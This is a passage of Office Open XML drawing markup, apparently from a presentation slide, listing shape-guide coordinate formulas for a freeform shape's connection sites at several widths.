              <a:gd name="connsiteY72" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 66253 w 1453745"/>
              <a:gd name="connsiteY73" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 66253 w 1453745"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1453745 w 1453745"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1453745 w 1453745"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 190439 w 1453745"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 227032 w 1453745"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 238532 w 1453745"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 255939 w 1453745"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 267517 w 1453745"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 340360 w 1453745"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 356047 w 1453745"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 374887 w 1453745"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 362661 w 1453745"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 355319 w 1453745"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 354117 w 1453745"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 361702 w 1453745"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 391660 w 1453745"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 421458 w 1453745"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 435470 w 1453745"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 459901 w 1453745"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 496784 w 1453745"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 535165 w 1453745"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 541324 w 1453745"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 549606 w 1453745"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 553216 w 1453745"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 567082 w 1453745"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 569813 w 1453745"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 568071 w 1453745"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 574980 w 1453745"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 586239 w 1453745"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 592142 w 1453745"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 591455 w 1453745"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 583103 w 1453745"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 563756 w 1453745"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 565385 w 1453745"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 553085 w 1453745"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 552810 w 1453745"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 557109 w 1453745"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 567482 w 1453745"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 578378 w 1453745"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 585724 w 1453745"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 585020 w 1453745"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 588463 w 1453745"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 609893 w 1453745"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 592419 w 1453745"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 567827 w 1453745"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 553302 w 1453745"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 528476 w 1453745"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 485756 w 1453745"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 420008 w 1453745"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 390825 w 1453745"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 394895 w 1453745"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 362726 w 1453745"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 352613 w 1453745"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 336830 w 1453745"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 334288 w 1453745"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 335281 w 1453745"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308265 w 1453745"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 284822 w 1453745"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 238621 w 1453745"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 210058 w 1453745"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 190853 w 1453745"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196675 w 1453745"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 191067 w 1453745"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 196940 w 1453745"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 178528 w 1453745"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 167264 w 1453745"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 168720 w 1453745"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 163585 w 1453745"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 123723 w 1453745"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 54248 w 1453745"/>
              <a:gd name="connsiteY69" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 17683 w 1453745"/>
              <a:gd name="connsiteY70" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 936 w 1453745"/>
              <a:gd name="connsiteY71" fmla="*/ 224344 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 27363 w 1453745"/>
              <a:gd name="connsiteY72" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 66253 w 1453745"/>
              <a:gd name="connsiteY73" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 72846 w 1460338"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1460338 w 1460338"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1460338 w 1460338"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 197032 w 1460338"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 233625 w 1460338"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 245125 w 1460338"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 262532 w 1460338"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 274110 w 1460338"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 346953 w 1460338"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 362640 w 1460338"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 381480 w 1460338"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 369254 w 1460338"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 361912 w 1460338"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 360710 w 1460338"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 368295 w 1460338"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 398253 w 1460338"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 428051 w 1460338"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 442063 w 1460338"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 466494 w 1460338"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 503377 w 1460338"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 541758 w 1460338"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 547917 w 1460338"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 556199 w 1460338"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 559809 w 1460338"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 573675 w 1460338"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 576406 w 1460338"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 574664 w 1460338"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 581573 w 1460338"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 592832 w 1460338"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 598735 w 1460338"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 598048 w 1460338"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 589696 w 1460338"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 570349 w 1460338"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 571978 w 1460338"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 559678 w 1460338"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 559403 w 1460338"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 563702 w 1460338"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 574075 w 1460338"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 584971 w 1460338"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 592317 w 1460338"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 591613 w 1460338"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 595056 w 1460338"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 616486 w 1460338"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 599012 w 1460338"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 574420 w 1460338"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 559895 w 1460338"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 535069 w 1460338"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 492349 w 1460338"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 426601 w 1460338"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 397418 w 1460338"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 401488 w 1460338"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 369319 w 1460338"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 359206 w 1460338"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 343423 w 1460338"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 340881 w 1460338"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 341874 w 1460338"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 314858 w 1460338"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 291415 w 1460338"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 245214 w 1460338"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 216651 w 1460338"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 197446 w 1460338"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 203268 w 1460338"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 197660 w 1460338"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 203533 w 1460338"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 185121 w 1460338"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 173857 w 1460338"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 175313 w 1460338"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 170178 w 1460338"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 130316 w 1460338"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 60841 w 1460338"/>
              <a:gd name="connsiteY69" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 24276 w 1460338"/>
              <a:gd name="connsiteY70" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 783 w 1460338"/>
              <a:gd name="connsiteY71" fmla="*/ 224344 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 33956 w 1460338"/>
              <a:gd name="connsiteY72" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 72846 w 1460338"/>
              <a:gd name="connsiteY73" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 75647 w 1463139"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1463139 w 1463139"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1463139 w 1463139"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 199833 w 1463139"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 236426 w 1463139"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 247926 w 1463139"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 265333 w 1463139"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 276911 w 1463139"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 349754 w 1463139"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 365441 w 1463139"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 384281 w 1463139"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 372055 w 1463139"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 364713 w 1463139"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 363511 w 1463139"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 371096 w 1463139"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 401054 w 1463139"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 430852 w 1463139"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 444864 w 1463139"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 469295 w 1463139"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 506178 w 1463139"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 544559 w 1463139"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 550718 w 1463139"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 559000 w 1463139"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 562610 w 1463139"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 576476 w 1463139"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 579207 w 1463139"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 577465 w 1463139"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 584374 w 1463139"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 595633 w 1463139"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 601536 w 1463139"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 600849 w 1463139"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 592497 w 1463139"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 573150 w 1463139"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 574779 w 1463139"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 562479 w 1463139"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 562204 w 1463139"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 566503 w 1463139"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 576876 w 1463139"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 587772 w 1463139"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 595118 w 1463139"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 594414 w 1463139"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 597857 w 1463139"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 619287 w 1463139"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 601813 w 1463139"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 577221 w 1463139"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 562696 w 1463139"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 537870 w 1463139"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 495150 w 1463139"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 429402 w 1463139"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 400219 w 1463139"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 404289 w 1463139"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 372120 w 1463139"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 362007 w 1463139"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 346224 w 1463139"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 343682 w 1463139"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 344675 w 1463139"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 317659 w 1463139"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 294216 w 1463139"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 248015 w 1463139"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 219452 w 1463139"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 200247 w 1463139"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 206069 w 1463139"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
